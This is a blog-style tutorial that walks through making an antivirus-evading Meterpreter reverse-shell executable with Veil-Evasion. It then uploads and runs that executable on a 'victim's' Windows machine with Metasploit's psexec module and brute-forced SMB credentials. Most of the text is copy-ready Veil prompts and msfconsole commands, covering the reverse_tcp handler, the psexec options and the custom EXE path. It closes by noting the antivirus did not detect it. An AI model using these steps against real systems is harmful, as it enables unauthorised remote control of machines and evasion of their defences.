Last post explained about how to find windows share (SMB) credentials using brute-forcing method.



Today’s tutorial we going to upload and execute the undetectable payload to the victims machine using SMB credentials gotten from brute-force method.




For that i am going to use Microsoft windows authenticated user code execution.



This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the “psexec” utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.




Psexec utility is a command line tool allowing the execution of processes on a remote system and transfer the results of operations to the local console. It has a long list of optional parameters that allow a great deal of flexibility for IT administrators. The key feature of PsExec is to allow users to run a script or application within the security context of either the currently logged on user or as a user provided during program initialization.





For that we need Veil-Evasion tool to generate  payloads executables that bypass antivirus. For installing Veil-Evasion tool follow by previous post  Evading-Antivirus.





After Veil-Evasion is installed, just run the script inside the Veil-Evasion directory.










After executing python script. The Veil window will appear. You see that today it has 31 payloads:




You can obtain a list of all the payloads with the “list” command:






[>] Please enter a command: list


[>] Please enter a command: use 27


[>] Please enter a command: set use_pyherion Y




Screenshot from 2014-06-19 19:46:14



Screenshot from 2014-06-19 19:46:27



Screenshot from 2014-06-19 19:47:07





PyInjector creates a Python executable with an embedded ASCII payload in it, but it uses standard Windows API calls to put the payload in memory and execute it.




I am going to use the python/b64_substitution payload, so I type “use 27” and press Enter. It loads that component, as shown below:




[>] Please enter a command: generate






After giving generate command, Then it’s necessary to wait while the shellcode is been generated.




Now we are going to select msfvenom typing “1”





[>] Please enter the number of your choice : 1




Screenshot from 2014-06-19 19:47:44





After that we need to type some details:



Enter metasploit payload: “windows/meterpreter/reverse_tcp”


Enter value for ‘LHOST’, [tab] for local IP: “”


Enter value for ‘LPORT’: “8080”






You need to press enter and then Veil requests us the name of our payload. We are going to use Pyinstaller. It will create a setup1.exe installable. For this, we are going to type “1”.






[>] Please enter the number of your choice : 1




Next, I issue the “generate” command and press enter to create the executable.




Screenshot from 2014-06-19 19:48:38





we need to set our metaspoit to listen for meterperter reverse tcp connection in port 8080










#msf > use exploit/multi/handler




#msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp




#msf exploit(handler) > set LHOST




#msf exploit(handler) > set LPORT 8080




#msf exploit(handler) > exploit -j




#msf exploit(handler) > jobs






It will the show our current job of reverse_tcp handler, now  we going to use the psexec exploit in msfconsole.






msf > use exploit/windows/smb/psexec




msf exploit(psexec) > set RHOST




msf exploit(psexec) > set SMBPass bhuvi




msf exploit(psexec) > set SMBUser sathish




msf exploit(psexec) > set EXE::Custom /root/veil-output/compiled/setup1.exe




msf exploit(psexec) > set DisablePayloadHandler true




msf exploit(psexec) >  exploit




Screenshot from 2014-06-26 15:28:52




After entering the credetials and setting the path of undetectable executable in EXE:Custom,  when the victim connects the custom exe will be uploaded and executed on the victims machine gave as meterperter session to operate.



Screenshot from 2014-06-26 15:36:26



And our AV still not find any suspicious activity but its may vary for other  AV vendors.



Screenshot from 2014-06-21 21:44:10